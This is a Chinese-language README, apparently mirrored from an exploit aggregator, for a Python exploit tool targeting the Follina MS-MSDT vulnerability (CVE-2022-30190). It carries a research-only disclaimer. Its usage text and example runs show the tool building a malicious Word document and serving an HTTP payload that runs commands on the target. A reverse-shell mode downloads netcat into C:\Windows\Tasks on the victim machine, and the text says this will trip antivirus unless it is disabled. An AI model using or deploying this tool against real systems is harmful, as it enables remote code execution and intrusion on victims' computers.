## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TOXICENVELOPE-FOLLINA-CVE-2022-30190
# FOLLINA-CVE-2022-30190
FOLLINA-CVE-2022-30190 的实现
* * *
本仓库包含针对漏洞 `FOLLINA-CVE-2022-30190` 的利用工具
### **免责声明**
本工具仅用于安全测试和研究目的。 克隆/复刻本工具即表示原始开发者不对行为人的行为承担任何责任。
* * *
### **先决条件**
1. 从此处了解 CVE-2022-30190
2. 准备测试环境(建议使用 Virtual Box + Vagrant)
* 从此处下载 VirtualBox
* 从此处下载 Vagrant
* 从此处了解 Vagrant CLI
* * *
通过构造恶意的 Microsoft Word 文档来发起 "Follina" MS-MSDT 攻击,并通过 HTTP 服务器托管 payload。 
### **用法**
root@kitploit:~
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help 显示此帮助信息并退出
--command COMMAND
要在目标上执行的命令(默认:calc)
--output OUTPUT
输出的恶意文档文件(默认:./follina.doc)
--interface INTERFACE
用于托管 HTTP 服务器的网络接口或 IP 地址(默认:eth0)
--port PORT
托管 HTTP 服务器的端口(默认:8000)
* * *
### **示例**
弹出 `calc.exe`:
root@kitploit:~
$ python3 exploit.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000
弹出 `cmd.exe`:
root@kitploit:~
$ python3 exploit.py --command "cmd"
在端口 9001 上获取反向 shell。注意,这会将 netcat 二进制文件下载到受害者计算机并放置在 `C:\Windows\Tasks` 中。 它不会清理二进制文件。除非禁用防病毒软件,否则会触发防病毒检测。
root@kitploit:~
$ python3 exploit.py --reverse 9001
